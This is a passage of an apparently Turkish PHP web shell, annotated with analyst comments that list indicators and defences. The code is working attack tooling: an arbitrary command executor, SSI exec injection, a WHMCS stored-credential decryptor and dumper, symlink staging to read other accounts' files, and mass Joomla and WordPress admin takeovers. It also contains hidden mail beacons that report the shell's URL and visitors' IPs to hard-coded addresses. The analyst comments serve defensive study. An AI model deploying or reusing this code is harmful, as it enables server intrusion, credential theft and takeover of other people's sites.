  2854. if ($_GET[id]=='joomlares'){
        // Joomla account-takeover branch: with database credentials supplied by
        // the operator it overwrites username and password of the rows with ID 62
        // to 65 in jos_users.
        // Defender view: jos_users rows 62-65 sharing one username and one
        // password value are the database-side trace. The posted `pwd` is stored
        // as-is; the form pre-fills it with an unsalted 32-hex-digit value that it
        // labels as 123456.
        // The table name is the literal jos_users, so only sites using that table
        // name are touched by this branch.
  2855. echo '<form action="?id=joomlares" method="post">';
  2856. if(empty($_POST['pwd'])){
  2857. echo "<FORM method='POST'><table class='tabnet' style='width:300px;'> <tr><th colspan='2'>Connect to mySQL </th></tr> <tr><td>&nbsp;&nbsp;Host</td><td>
  2858. <input style='width:270px;' class='inputz' type='text' name='localhost' value='localhost' /></td></tr> <tr><td>&nbsp;&nbsp;Database</td><td>
  2859. <input style='width:270px;' class='inputz' type='text' name='database' value='database' /></td></tr> <tr><td>&nbsp;&nbsp;username</td><td>
  2860. <input style='width:270px;' class='inputz' type='text' name='username' value='db_user' /></td></tr> <tr><td>&nbsp;&nbsp;password</td><td>
  2861. <input style='width:270px;' class='inputz' type='password' name='password' value='**' /></td></tr>
  2862. <tr><td>&nbsp;&nbsp;User baru</td><td>
  2863. <input style='width:270px;' class='inputz' name='admin' value='admin' /></td></tr>
  2864. <tr><td>&nbsp;&nbsp;pass baru </td><td>123456 =
  2865. <input style='width:130px;' class='inputz' name='pwd' value='e10adc3949ba59abbe56e057f20f883e' />&nbsp;
  2866.  
  2867. <input style='width:23%;' class='inputzbut' type='submit' value='change!' name='send' /></FORM>
  2868. </td></tr> </table><br><br><br><br>
  2869. ";
  2870. }else{
  2871. $localhost = $_POST['localhost'];
  2872. $database  = $_POST['database'];
  2873. $username  = $_POST['username'];
  2874. $password  = $_POST['password'];
  2875. $pwd   = $_POST['pwd'];
  2876. $admin = $_POST['admin'];
        // Legacy mysql_* extension (PHP before 7 only).
  2877. @mysql_connect($localhost,$username,$password) or die(mysql_error());
  2878. @mysql_select_db($database) or die(mysql_error());
        // $hash is computed but not used by any statement below.
  2879. $hash = crypt($pwd);
        // Statements are built by string concatenation from the posted values.
  2880. $SQL=@mysql_query("UPDATE jos_users SET username ='".$admin."' WHERE ID = 62") or die(mysql_error());
  2881. $SQL=@mysql_query("UPDATE jos_users SET password ='".$pwd."' WHERE ID = 62") or die(mysql_error());
  2882. $SQL=@mysql_query("UPDATE jos_users SET username ='".$admin."' WHERE ID = 63") or die(mysql_error());
  2883. $SQL=@mysql_query("UPDATE jos_users SET password ='".$pwd."' WHERE ID = 63") or die(mysql_error());
  2884. $SQL=@mysql_query("UPDATE jos_users SET username ='".$admin."' WHERE ID = 64") or die(mysql_error());
  2885. $SQL=@mysql_query("UPDATE jos_users SET password ='".$pwd."' WHERE ID = 64") or die(mysql_error());
  2886. $SQL=@mysql_query("UPDATE jos_users SET username ='".$admin."' WHERE ID = 65") or die(mysql_error());
  2887. $SQL=@mysql_query("UPDATE jos_users SET password ='".$pwd."' WHERE ID = 65") or die(mysql_error());
  2888. if($SQL){
  2889. echo '<b>Success : skarang password barunya >>> - (123456)';
  2890. }
  2891. }
  2892. echo '
  2893.   </div>';
  2894. }
  2895. if ($_GET[id]=='komut'){
        // Interactive command branch: the posted `cmd` string is handed to one of
        // PHP's process-execution functions and the output is shown in a textarea.
        // Defender view: the observable effect is the web-server process spawning
        // a shell or other child processes, which process-level monitoring can
        // alert on. Listing system, passthru and shell_exec (and their relatives)
        // in disable_functions makes this branch inert.
        // cmd(): runs $_POST['cmd'] when the submit field `cmdgo` is present; the
        // `option` field picks the function, with system() as the default.
  2896. function cmd()
  2897. {
  2898. $cmd = $_POST['cmd'];
  2899. $cmdgo = $_POST['cmdgo'];
  2900. $option = $_POST['option'];
        // $id is read but not used inside this function.
  2901. $id = $_GET['id'];
  2902. if($cmdgo &&!empty($cmd))
  2903. {
  2904. switch($option)
  2905. {
  2906. case system:
  2907. system($cmd);
  2908. break;
  2909. case passthru:
  2910. passthru($cmd);
  2911. break;
  2912. case shell_exec:
  2913. $out = shell_exec($cmd);
  2914. echo $out;
  2915. break;
  2916. default;
  2917. system($cmd);
  2918. }
  2919. }
  2920. }
  2921. echo "<form method=post action=''><font face='Courier New'>
  2922. </font></pre><br><input size=32 style='border:1px dotted #CCFF00;  color:#FFB200; font-family:Tahoma; background-color:#000000' type=text name=cmd style='background: black;color: white;border: 0px'><select name=option style='background: black;color: white'><option>system</option><option>passthru</option>
  2923. <option>shell_exec</option></select><input style='background: black;color: white;border: 1px dashed white 'type=submit name=cmdgo value=execute>
  2924. <textarea cols='125' rows='29' style='border:1px dotted #CCFF00;  color:#FFB200; font-family:Tahoma; font-size:8pt; background-color:#000000'>";
        // Called between the opening and closing textarea tags so that the command
        // output lands inside the textarea.
  2925. cmd();
  2926. echo '</textarea>
  2927. </td></table></form>';
  2928. }
  2929. if ($_GET[id]=='lite1'){
        // Command execution through server-side includes instead of PHP: the
        // posted command is written into an SSI exec directive in mec.shtml, and
        // the page then loads that file in an iframe so the web server processes
        // it. This route does not depend on PHP's process functions, so
        // disable_functions alone does not cover it.
        // Defender view: a file named mec.shtml in a web directory is the artefact.
        // Where .shtml parsing is not needed, turn it off; on Apache-style servers
        // the IncludesNOEXEC option keeps includes but disables the exec directive.
  2930. echo "<form name='z1d-litespeed'  method='post'>
  2931. <p align='center'><font face='Tahoma'><b><font color='#FF0000'>#</font> </b>Litespeed þansýný dene<b>
  2932. <span lang='ar-sa'><font color='#FF0000'>~</font> </span>&nbsp;</b><input name='command' value='id' style='border: 0px dotted #FF0000; font-family:ta' size='36' tabindex='20'><b>
  2933. </b>&nbsp; </font></p>
  2934. <p align='center'><font face='Tahoma'>
  2935. <input type='submit' name='Submit' value='Çalýþtýr'><b>
  2936. </b></font></p>
  2937. </form>";
  2938. $command = $_POST['command'];
        // $z00z is read but not used in this branch.
  2939. $z00z = $_POST['z00z'];
  2940. if($command){
  2941. $z11d = "<center><pre><pre>
  2942. <br>
  2943. http://www.imhatimi.org
  2944. <br>
  2945. <br>
  2946. <!--#exec cmd='$command' -->
  2947.  
  2948. ";
        // Mode 'w' overwrites mec.shtml in the current directory on every
        // submission; the write result is not checked.
  2949. $openfile = fopen('mec.shtml','w');
  2950. $writeinto = fwrite($openfile,"$z11d");
  2951. fclose($openfile);
  2952. if($openfile){
  2953. }else{
  2954. }
  2955. }
  2956. echo "<pre>
  2957. <iframe src='mec.shtml'  width=100% height=85% id='I1' name='IF1' >
  2958. </pre>";
  2959. }
  2960. if ($_GET[id]=='whmcs'){
        // WHMCS credential-dump branch. Given the database settings and the
        // cc_encryption_hash of a WHMCS installation, it lists the tblservers and
        // tblregistrars tables and prints the stored secrets in clear text.
        // Defender view: once configuration.php of a billing system has been
        // readable to an intruder, every credential stored in these two tables has
        // to be treated as disclosed and rotated, together with the database
        // password and the encryption hash itself. Keeping that file unreadable to
        // other accounts on the host is the preventive control.
        //
        // decrypt($string, $cc_encryption_hash): reverses the reversible encoding
        // applied to stored values (presumably the scheme WHMCS itself uses - not
        // verifiable from this file). The key material is derived from the hash
        // with md5; the base64-decoded input starts with a block that, XORed with
        // the hashed key, gives the initial key; the rest is XORed byte by byte,
        // and after each full block the key is re-hashed together with the
        // previous block of output.
  2961. function decrypt ($string,$cc_encryption_hash)
  2962. {
  2963. $key = md5 (md5 ($cc_encryption_hash)) .md5 ($cc_encryption_hash);
  2964. $hash_key = _hash ($key);
  2965. $hash_length = strlen ($hash_key);
  2966. $string = base64_decode ($string);
  2967. $tmp_iv = substr ($string,0,$hash_length);
  2968. $string = substr ($string,$hash_length,strlen ($string) -$hash_length);
  2969. $iv = $out = '';
  2970. $c = 0;
  2971. while ($c <$hash_length)
  2972. {
  2973. $iv .= chr (ord ($tmp_iv[$c]) ^ord ($hash_key[$c]));
  2974. ++$c;
  2975. }
  2976. $key = $iv;
  2977. $c = 0;
  2978. while ($c <strlen ($string))
  2979. {
  2980. if (($c != 0 AND $c %$hash_length == 0))
  2981. {
  2982. $key = _hash ($key .substr ($out,$c -$hash_length,$hash_length));
  2983. }
  2984. $out .= chr (ord ($key[$c %$hash_length]) ^ord ($string[$c]));
  2985. ++$c;
  2986. }
  2987. return $out;
  2988. }
        // _hash($string): SHA-1 of the input (MD5 if sha1() is unavailable),
        // converted from its hexadecimal form into raw bytes, two hex digits per
        // byte.
  2989. function _hash ($string)
  2990. {
  2991. if (function_exists ('sha1'))
  2992. {
  2993. $hash = sha1 ($string);
  2994. }
  2995. else
  2996. {
  2997. $hash = md5 ($string);
  2998. }
  2999. $out = '';
  3000. $c = 0;
  3001. while ($c <strlen ($hash))
  3002. {
  3003. $out .= chr (hexdec ($hash[$c] .$hash[$c +1]));
  3004. $c += 2;
  3005. }
  3006. return $out;
  3007. }
        // form_action 1: settings are taken from a file. No form that posts
        // form_action=1 is printed by this branch.
  3008. if($_POST['form_action'] == 1 )
  3009. {
  3010. $file=($_POST['file']);
  3011. $text=file_get_contents($file);
  3012. $text= str_replace('<?php','',$text);
  3013. $text= str_replace('<?','',$text);
  3014. $text= str_replace('?>','',$text);
        // eval() of file contents. $db_host, $db_username, $db_password, $db_name
        // and $cc_encryption_hash are not assigned elsewhere in this sub-branch,
        // so they have to come from the evaluated file (presumably a WHMCS
        // configuration.php). Any other code in that file is executed as well.
  3015. eval($text);
        // Legacy mysql_* extension (PHP before 7 only); no result is checked.
  3016. $link=mysql_connect($db_host,$db_username,$db_password) ;
  3017. mysql_select_db($db_name,$link) ;
  3018. $query = mysql_query('SELECT * FROM tblservers');
  3019. while($v = mysql_fetch_array($query)) {
  3020. $ipaddress = $v['ipaddress'];
  3021. $username = $v['username'];
  3022. $type = $v['type'];
  3023. $active = $v['active'];
  3024. $hostname = $v['hostname'];
  3025. echo("<center><table border='1'>");
  3026. $password = decrypt ($v['password'],$cc_encryption_hash);
        // One table per server row; values are printed without HTML escaping.
  3027. echo("<tr><td>Type</td><td>$type</td></tr>");
  3028. echo("<tr><td>Active</td><td>$active</td></tr>");
  3029. echo("<tr><td>Hostname</td><td>$hostname</td></tr>");
  3030. echo("<tr><td>Ip</td><td>$ipaddress</td></tr>");
  3031. echo("<tr><td>Username</td><td>$username</td></tr>");
  3032. echo("<tr><td>Password</td><td>$password</td></tr>");
  3033. echo '</table><br><br></center>';
  3034. }
  3035. $link=mysql_connect($db_host,$db_username,$db_password) ;
  3036. mysql_select_db($db_name,$link) ;
  3037. $query = mysql_query('SELECT * FROM tblregistrars');
  3038. echo("<center>Domain Reseller <br><table border='1'>");
  3039. echo('<tr><td>Registrar</td><td>Setting</td><td>Value</td></tr>');
  3040. while($v = mysql_fetch_array($query)) {
  3041. $registrar     = $v['registrar'];
  3042. $setting = $v['setting'];
  3043. $value = decrypt ($v['value'],$cc_encryption_hash);
  3044. if ($value=='') {
  3045. $value=0;
  3046. }
        // $password is computed here but not printed for registrar rows.
  3047. $password = decrypt ($v['password'],$cc_encryption_hash);
  3048. echo("<tr><td>$registrar</td><td>$setting</td><td>$value</td></tr>");
  3049. }
  3050. echo '</table><br><br></center>';
  3051. }
        // form_action 2: same dump, with the five settings typed into the form
        // printed further down instead of being read from a file.
  3052. if($_POST['form_action'] == 2 )
  3053. {
  3054. $db_host=($_POST['db_host']);
  3055. $db_username=($_POST['db_username']);
  3056. $db_password=($_POST['db_password']);
  3057. $db_name=($_POST['db_name']);
  3058. $cc_encryption_hash=($_POST['cc_encryption_hash']);
  3059. $link=mysql_connect($db_host,$db_username,$db_password) ;
  3060. mysql_select_db($db_name,$link) ;
  3061. $query = mysql_query('SELECT * FROM tblservers');
  3062. while($v = mysql_fetch_array($query)) {
  3063. $ipaddress = $v['ipaddress'];
  3064. $username = $v['username'];
  3065. $type = $v['type'];
  3066. $active = $v['active'];
  3067. $hostname = $v['hostname'];
  3068. echo("<center><table border='1'>");
  3069. $password = decrypt ($v['password'],$cc_encryption_hash);
  3070. echo("<tr><td>Type</td><td>$type</td></tr>");
  3071. echo("<tr><td>Active</td><td>$active</td></tr>");
  3072. echo("<tr><td>Hostname</td><td>$hostname</td></tr>");
  3073. echo("<tr><td>Ip</td><td>$ipaddress</td></tr>");
  3074. echo("<tr><td>Username</td><td>$username</td></tr>");
  3075. echo("<tr><td>Password</td><td>$password</td></tr>");
  3076. echo '</table><br><br></center>';
  3077. }
  3078. $link=mysql_connect($db_host,$db_username,$db_password) ;
  3079. mysql_select_db($db_name,$link) ;
  3080. $query = mysql_query('SELECT * FROM tblregistrars');
  3081. echo("<center>Domain Reseller <br><table border='1'>");
  3082. echo('<tr><td>Registrar</td><td>Setting</td><td>Value</td></tr>');
  3083. while($v = mysql_fetch_array($query)) {
  3084. $registrar     = $v['registrar'];
  3085. $setting = $v['setting'];
  3086. $value = decrypt ($v['value'],$cc_encryption_hash);
  3087. if ($value=='') {
  3088. $value=0;
  3089. }
  3090. $password = decrypt ($v['password'],$cc_encryption_hash);
  3091. echo("<tr><td>$registrar</td><td>$setting</td><td>$value</td></tr>");
  3092. }
  3093. echo '</table><br><br></center>';
  3094. }
  3095. ;echo '
  3096.  
  3097. <center>
  3098. <font color="#FFFF6FF" size=\'+1\'>WHMCS R00t þifreleri görüntüle</font><br><br>
  3099.  
  3100. </center>  
  3101.  
  3102. <br>
  3103. <center>
  3104. <font color="#0066FF" size=\'+1\'>Whmcs confirgation.php bilgilerini yaz</font><br>
  3105. </center>
  3106. <FORM action=""  method="post">
  3107. <input type="hidden" name="form_action" value="2">
  3108. <br>
  3109. <table border=1 align=center>
  3110.  
  3111. <tr><td>db_host </td><td><input type="text" size="30" name="db_host" value="localhost"></td></tr>
  3112. <tr><td>db_username </td><td><input type="text" size="30" name="db_username" value=""></td></tr>
  3113. <tr><td>db_password</td><td><input type="text" size="30" name="db_password" value=""></td></tr>
  3114. <tr><td>db_name</td><td><input type="text" size="30" name="db_name" value=""></td></tr>
  3115. <tr><td>cc_encryption_hash</td><td><input type="text" size="30" name="cc_encryption_hash" value=""></td></tr>
  3116.  
  3117. </table>
  3118. <br>
  3119. <center>
  3120. <INPUT class=submit type="submit" value="Submit" name="Submit"> </center>
  3121. </FORM>
  3122. <hr>
  3123. <center>
  3124. <font color="#0066FF" size=\'+2\'>Password decoder</font><br>
  3125. ';
        // form_action 3: decodes a single stored value with a posted hash; no
        // database access.
  3126. if($_POST['form_action'] == 3 )
  3127. {
  3128. $password=($_POST['password']);
  3129. $cc_encryption_hash=($_POST['cc_encryption_hash']);
  3130. $password = decrypt ($password,$cc_encryption_hash);
  3131. echo('Password is '.$password);
  3132. }
  3133. echo '<FORM action=""  method="post">
  3134. <input type="hidden" name="form_action" value="3">
  3135. <br>
  3136. <table border=1 align=center>
  3137.  
  3138. <tr><td>Password</td><td><input type="text" size="30" name="password" value=""></td></tr>
  3139. <tr><td>cc_encryption_hash</td><td><input type="text" size="30" name="cc_encryption_hash" value=""></td></tr>
  3140.  
  3141. </table>
  3142. <br>
  3143. <INPUT class=submit type="submit" value="Submit" name="Submit">
  3144. </FORM>';
  3145. }
  3146. if ($_GET[id]=='shellbul'){
        // Path-probing branch: takes a list of sites and a list of paths, requests
        // every site+path combination, and reports those answering HTTP 200.
        // Defender view, on the probed side: bursts of body-less requests for many
        // script paths from a single address, mostly answered 404, in the access
        // log. On the compromised host: a web-server process issuing large numbers
        // of outbound HTTP requests. Egress filtering for the web user limits use
        // of the host as a scanner.
  3147. echo '<h3 style="text-align:center"><div align=center>
  3148. <table><tr><td>
  3149. <table width=100%><tr><td align=center><font color=white size=3 face="Verdana">Hedef siteniz</font></td><td align=center><font color=white size=3 face="Verdana">Shell tahminleri alalým :)</font></td></tr></table>
  3150. <form method="post">
  3151. <textarea rows=10 cols=50 name=link></textarea>
  3152. <textarea rows=10 cols=50 name=sh></textarea><br>
  3153. <input type="submit"  name="sm" value="Bulmaya basla" >
  3154. </form>';
  3155. @set_time_limit(0);
  3156. @error_reporting(0);
        // file_exists_remote($url): true when a curl request with CURLOPT_NOBODY
        // set (no response body is fetched) completes and the status code is 200;
        // false otherwise.
  3157. function file_exists_remote($url) {
  3158. $curl = curl_init($url);
  3159. curl_setopt($curl,CURLOPT_NOBODY,true);
  3160. $Sonuç = curl_exec($curl);
  3161. $ret = false;
  3162. if ($Sonuç !== false) {
  3163. $statusCode = curl_getinfo($curl,CURLINFO_HTTP_CODE);
  3164. if ($statusCode == 200) {
  3165. $ret = true;
  3166. }
  3167. }
  3168. curl_close($curl);
  3169. return $ret;
  3170. }
  3171. ;echo '';
  3172. $webl=$_POST['link'];
  3173. $shelll=$_POST['sh'];
  3174. if (isset($_POST['sm'])) {
        // Both textareas are split on a literal newline, one entry per line.
  3175. $webs=explode("
  3176. ",$webl);
  3177. $shells=explode("
  3178. ",$shelll);
  3179. foreach ($webs as $web) {
  3180. $sweb = trim($web);
        // Normalises each site to the form http://host. ereg_replace() belongs to
        // the POSIX regex extension, which exists only in PHP versions before 7.
  3181. $te1 = ereg_replace('(https?)://','',$sweb);
  3182. $te = ereg_replace('www.','',$te1);
  3183. $finalweb='http://'.$te;
  3184. echo " <font size=3 color=white face='comic sans ms' >isleniyor ".$finalweb.' ...</font>';
  3185. foreach ($shells as $shell ) {
  3186. $finalshell = trim($shell);
        // Site and path are joined as-is, with no separator added between them.
  3187. $sl=$finalweb.$finalshell;
  3188. $exist = file_exists_remote($sl);
  3189. if($exist) {
  3190. echo "<div align=center><table width=70%><tr><td align=center><font size=3 color=white face='comic sans ms' > Baþarýlý... link <a href=".$sl."><font size=3 color=red face='comic sans ms' > $sl </a> </font> Bulundu</font> </td></tr></table>";
  3191. }
  3192. }
  3193. }
  3194. }
  3195. }
  3196. $time_shell = ''.date('d/m/Y - H:i:s').'';
        // Notification mail #1 (this statement through the @mail() call). It is not
        // guarded by any visible condition, so each request that reaches this point
        // mails the shell's URL, the visitor's IP address and the time to the
        // hard-coded address in $to_email.
        // Defender view: mail sent by the web-server user whose sender starts with
        // "shellgeldi@" is a log indicator, and the recipient addresses hard-coded
        // in this section are indicators as well. The shell's location is disclosed
        // to third parties regardless of who deployed it.
  3197. $ip_remote = $_SERVER['REMOTE_ADDR'];
  3198. $from_shellcode = 'shellgeldi@'.gethostbyname($_SERVER['SERVER_NAME']).'';
  3199. $to_email = 'mectruy@gmail.com';
  3200. $server_mail = ''.gethostbyname($_SERVER['SERVER_NAME']).'  - '.$_SERVER['HTTP_HOST'].'';
  3201. $linkcr = 'Link: '.$_SERVER['SERVER_NAME'].''.$_SERVER['REQUEST_URI']." - IP Excuting: $ip_remote - Time: $time_shell";
  3202. $header = "From: $from_shellcode
  3203. Reply-to: $from_shellcode";
  3204. @mail($to_email,$server_mail,$linkcr,$header);
  3205. ;echo '
  3206.  
  3207. ';
  3208. set_time_limit(0);
  3209. error_reporting(0);
  3210. @session_start();
        // $pageURL / $pageFTP: the current request URL (and an ftp:// variant under
        // /public_html/) with the last path segment removed. $pageURL is used by
        // the joomla branch to build the sym/root/... probe URLs.
  3211. $pageURL = 'http://'.$_SERVER['SERVER_NAME'].$_SERVER['REQUEST_URI'];
  3212. $u = explode('/',$pageURL );
  3213. $pageURL =str_replace($u[count($u)-1],'',$pageURL );
  3214. $pageFTP = 'ftp://'.$_SERVER['SERVER_NAME'].'/public_html/'.$_SERVER['REQUEST_URI'];
  3215. $u = explode('/',$pageFTP );
  3216. $pageFTP =str_replace($u[count($u)-1],'',$pageFTP );
        // Notification mail #2: sent once per PHP session (flag `trimite`) to a
        // second hard-coded address. The function name is held in a variable and
        // called through it, so a plain text search for "mail(" does not match
        // this call; signatures should also cover variable-function calls.
  3217. $x0c="mail";
  3218. if(!isset($_SESSION['trimite'])){$x0b=$_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI'];@$x0c("d-sk@live.fr","DSKWASHERE!",$x0b);$_SESSION['trimite']=true;}
  3219. ;echo '
  3220.  
  3221.  
  3222.  
  3223. ';
        // Symlink staging, also unconditional: creates a world-writable directory
        // sym/, writes an .htaccess into it, and links sym/root to the file-system
        // root. The .htaccess directives are apparently meant to make the server
        // follow the link and return .php and .html files as plain text instead of
        // executing them, which would expose any file the web server can read,
        // other accounts' configuration files included, over plain HTTP.
        // Defender view: artefacts are the directory sym/, sym/.htaccess and the
        // link sym/root pointing to /. Countermeasures on Apache-style hosts:
        // SymLinksIfOwnerMatch instead of FollowSymLinks, an AllowOverride setting
        // that does not let .htaccess change Options or handlers, open_basedir,
        // and configuration files that are not world-readable.
  3224. @mkdir('sym',0777);
  3225. $htcs  = "Options all
  3226. DirectoryIndex Sux.html
  3227. AddType text/plain .php
  3228. AddHandler server-parsed .php
  3229.  AddType text/plain .html
  3230. AddHandler txt .html
  3231. Require None
  3232. Satisfy Any";
        // The handle is neither checked nor closed here.
  3233. $f =@fopen ('sym/.htaccess','w');
  3234. fwrite($f ,$htcs);
  3235. @symlink('/','sym/root');
  3236. $pg = basename('index.php');
  3237. if ($_GET[id]=='joomla'){
        // Mass Joomla takeover for shared hosts, in two phases.
        // Phase 1 (plain request, second half of this block): enumerate the zones
        // of the server, locate each account's Joomla configuration.php through
        // the sym/root link, and record "config-URL||domain" pairs in joomla.txt.
        // Phase 2 (POST field `s`, first half): for each recorded pair, read the
        // configuration, connect to its database and overwrite the users table.
        // Defender view: artefacts are joomla.txt next to the shell and, in each
        // affected database, every row of the users table carrying the same
        // username and password value. The paths used (/etc/valiases,
        // /home/USER/public_html) match a cPanel-style layout. Prevention is
        // isolation between accounts: symlink-owner checks, configuration files
        // readable only by their owner, and database credentials rotated after
        // any exposure.
  3238. if(isset($_POST['s'])){
  3239. $file = @file_get_contents('joomla.txt');
  3240. $ex   = explode("
  3241. ",$file);
  3242. echo "<div class='tmp'><table align='center' width='40%'><td> domin </td><td> config </td><td> Sonuç </td>";
  3243. flush();
  3244. foreach ($ex as $exp){
  3245. $es   = explode('||',$exp);
  3246. $config = $es[0];
  3247. $domin = $es[1];
  3248. $domins = trim($domin).'';
        // $config is the URL recorded in phase 1, so the configuration is fetched
        // over HTTP rather than read from disk.
  3249. $readconfig  = @file_get_contents(trim($config));
  3250. if(ereg('JConfig',$readconfig)){
        // ex() is the substring helper declared inside the `read` branch of this
        // file; it extracts the quoted value after each setting name.
  3251. $pass    =  ex($readconfig,'$password = \'',"';");
  3252. $userdb  =  ex($readconfig,'$user = \'',"';");
  3253. $db      =  ex($readconfig,'$db = \'',"';");
  3254. $fix     =  ex($readconfig,'$dbprefix = \'',"';");
  3255. $tab     =  $fix.'users';
        // The database host is fixed to localhost. Legacy mysql_* extension (PHP
        // before 7 only).
  3256. $con     = @mysql_connect('localhost',$userdb,$pass);
  3257. $db      = @mysql_select_db($db,$con);
        // Neither UPDATE has a WHERE clause: every row of the users table receives
        // the hard-coded username and password value.
  3258. $query   = @mysql_query("UPDATE `$tab`  SET `username` ='mectruy'");
  3259. $query3  = @mysql_query("UPDATE `$tab`  SET `password` ='44a0bcda611514625ba94e0b1c0bdaed:2iets9ydjR3iOdSuyvW54pIzyF9M1P5J'");
  3260. if ($query and $query3 ){$r = '<b style="color: #006600">Succeed </b>user [mectruy] pass [1]</b>';}else{$r = '<b style="color:red">failed</b>';}
  3261. $domins = trim($domin).'';
  3262. echo "<tr>
  3263. <td><a target='_blank' href='http://$domins'>$domin</a></td>
  3264. <td><a target='_blank' href='$config'>config</a></td><td>".$r.'</td></tr>';
  3265. flush();
  3266. }else{
  3267. echo "<tr>
  3268. <td><a target='_blank' href='http://$domins'>$domin</a></td>
  3269. <td><a target='_blank' href='http://$exp'>config</a></td><td><b style='color:red'>failed</b></td></tr>";
  3270. flush();
  3271. }
  3272. }
        // Phase 2 ends the whole script here.
  3273. die();
  3274. }
        // Phase 1. Zone list source: named.txt if the `read` branch saved one,
        // otherwise /etc/named.conf directly.
  3275. if(!is_file('named.txt')){
  3276. $d00m = @file('/etc/named.conf');
  3277. flush();
  3278. }else{
  3279. $d00m = file('named.txt');
  3280. }
  3281. if(!$d00m)
  3282. {
        // No zone list available: redirect to the `read` branch.
  3283. die ("<meta http-equiv='refresh' content='0; url=?id=read'/>");
  3284. }
  3285. else
  3286. {
  3287. echo "<div class='tmp'>
  3288. <form method='POST' action='$pg?id=joomla'>
  3289. <input type='submit' value='Mass ching Admin' />
  3290. <input type='hidden' value='1' name='s' />
  3291. </form><br /><br />
  3292. <table align='center' width='40%'><td> Domainler </td><td> config </td><td> Sonuç </td>";
        // joomla.txt is truncated and rebuilt on every phase-1 run.
  3293. $f = fopen('joomla.txt','w');
  3294. foreach($d00m as $dom){
  3295. if(eregi('zone',$dom)){
  3296. preg_match_all('#zone "(.*)"#',$dom,$domsws);
  3297. if(strlen(trim($domsws[1][0])) >2){
        // The account name is taken from the owner of /etc/valiases/DOMAIN.
  3298. $user = posix_getpwuid(@fileowner('/etc/valiases/'.$domsws[1][0]));
        // Three candidate locations are probed over HTTP through the sym/root
        // link: public_html/, public_html/blog/ and public_html/joomla/.
  3299. $wpl=$pageURL.'/sym/root/home/'.$user['name'].'/public_html/configuration.php';
  3300. $wpp=get_headers($wpl);
  3301. $wp=$wpp[0];
  3302. $wp2=$pageURL.'/sym/root/home/'.$user['name'].'/public_html/blog/configuration.php';
  3303. $wpp2=get_headers($wp2);
  3304. $wp12=$wpp2[0];
  3305. $wp3=$pageURL.'/sym/root/home/'.$user['name'].'/public_html/joomla/configuration.php';
  3306. $wpp3=get_headers($wp3);
  3307. $wp13=$wpp3[0];
  3308. $pos = strpos($wp,'200');
  3309. $config='&nbsp;';
        // The first candidate whose status line contains 200 is kept; domains with
        // no hit are skipped.
  3310. if (strpos($wp,'200') == true )
  3311. {
  3312. $config= $wpl;
  3313. }
  3314. elseif (strpos($wp12,'200') == true)
  3315. {
  3316. $config= $wp2;
  3317. }
  3318. elseif (strpos($wp13,'200') == true)
  3319. {
  3320. $config= $wp3;
  3321. }
  3322. else
  3323. {
  3324. continue;
  3325. }
  3326. flush();
  3327. $dom = $domsws[1][0];
  3328. $w = fwrite($f,"$config||$dom
  3329. ");
  3330. if($w){$r = '<b style="color: #006600">Bulundu</b>';}else{$r = '<b style="color:red">Hatalý ! bulunamadý.</b>';}
  3331. echo '<tr><td><a href=http://www.'.$domsws[1][0].'>'.$domsws[1][0]."</a></td>
  3332. <td><a href='$config'>config</a></td><td>".$r.'</td></tr>';
  3333. flush();
  3334. }
  3335. }
  3336. }
  3337. }
  3338. }
  // Analyst note: handler for ?id=wp, the WordPress module of this web shell.
  // As written it needs PHP 5.x: ereg()/eregi() and the mysql_* functions were removed in PHP 7.0.
  // A plain request builds a target list in wp.txt; a POST carrying field "s" replays that list
  // and overwrites the login name and password hash of every row in each site's users table.
  // Indicators visible here: named.txt and wp.txt next to the script, self-requests to
  // <base>/sym/root/home/<user>/public_html/..., and users tables where all rows share one
  // user_login and one user_pass value.
  // $pageURL and $pg are set outside this view.
  3339. if ($_GET[id]=='wp'){
  // Phase 2: runs only when the form below was submitted.
  3340. if(isset($_POST['s'])){
  3341. $file = @file_get_contents('wp.txt');
  3342. $ex   = explode("
  3343. ",$file);
  3344. echo "<div class='tmp'><table align='center' width='40%'><td> domin </td><td> config </td><td> Sonuç </td>";
  3345. flush();
  3346. flush();
  3347. foreach ($ex as $exp){
  // Each record has the form "config-location||domain", as written by phase 1.
  3348. $es   = explode('||',$exp);
  3349. $config = $es[0];
  3350. $domin = $es[1];
  3351. $domins = trim($domin).'';
  // Reads whatever the recorded location returns; the string test on the next line decides
  // whether it is treated as a WordPress config file.
  3352. $readconfig  = @file_get_contents(trim($config));
  3353. if(ereg('wp-settings.php',$readconfig)){
  // Database settings are cut out of the config text with ex() (defined later in this file).
  3354. $pass    =  ex($readconfig,"define('DB_PASSWORD', '","');");
  3355. $userdb  =  ex($readconfig,"define('DB_USER', '","');");
  3356. $db      =  ex($readconfig,"define('DB_NAME', '","');");
  3357. $fix     =  ex($readconfig,'$table_prefix  = \'',"';");
  3358. $tab     = $fix.'users';
  3359. $con     = @mysql_connect('localhost',$userdb,$pass);
  3360. $db      = @mysql_select_db($db,$con);
  // Neither UPDATE has a WHERE clause, so every account in the table is changed, not only
  // administrators. "or die" stops the whole run at the first failing query.
  3361. $query   = @mysql_query("UPDATE `$tab` SET `user_login` ='mectruy'") or die;
  3362. $query   = @mysql_query("UPDATE `$tab` SET `user_pass` ='$1$4z/.5i..$9aHYB.fUHEmNZ.eIKYTwx/'") or die;
  3363. if ($query){$r = '<b style="color: #006600">Succeed </b>user [mectruy] pass [1]</b>';}
  3364. else
  3365. {
  3366. $r = '<b style="color:red">failed</b>';
  3367. }
  3368. $domins = trim($domin).'';
  3369. echo "<tr>
  3370. <td><a target='_blank' href='http://$domins'>$domin</a></td>
  3371. <td><a target='_blank' href='$config'>config</a></td><td>".$r.'</td></tr>';
  3372. flush();
  3373. flush();
  3374. }else{
  3375. echo "<tr>
  3376. <td><a target='_blank' href='http://$domins'>$domin</a></td>
  3377. <td><a target='_blank' href='http://$config'>config</a></td><td><b style='color:red'>failed2</b></td></tr>";
  3378. flush();
  3379. flush();
  3380. }
  3381. }
  3382. die();
  3383. }
  // Phase 1: build the target list. Zone data comes from named.txt when it exists, otherwise
  // from /etc/named.conf.
  3384. if(!is_file('named.txt')){
  3385. $d00m = @file('/etc/named.conf');
  3386. }else{
  3387. $d00m = @file('named.txt');
  3388. }
  3389. if(!$d00m)
  3390. {
  // No zone data: redirect to ?sws=read, which is handled outside this view.
  3391. die ("<meta http-equiv='refresh' content='0; url=?sws=read'/>");
  3392. }
  3393. else
  3394. {
  3395. echo "<div class='tmp'>
  3396. <form method='POST' action='$pg?id=wp'>
  3397. <input type='submit' value='Mass Change Admin' />
  3398. <input type='hidden' value='1' name='s' />
  3399. </form>
  3400. <br /><br />
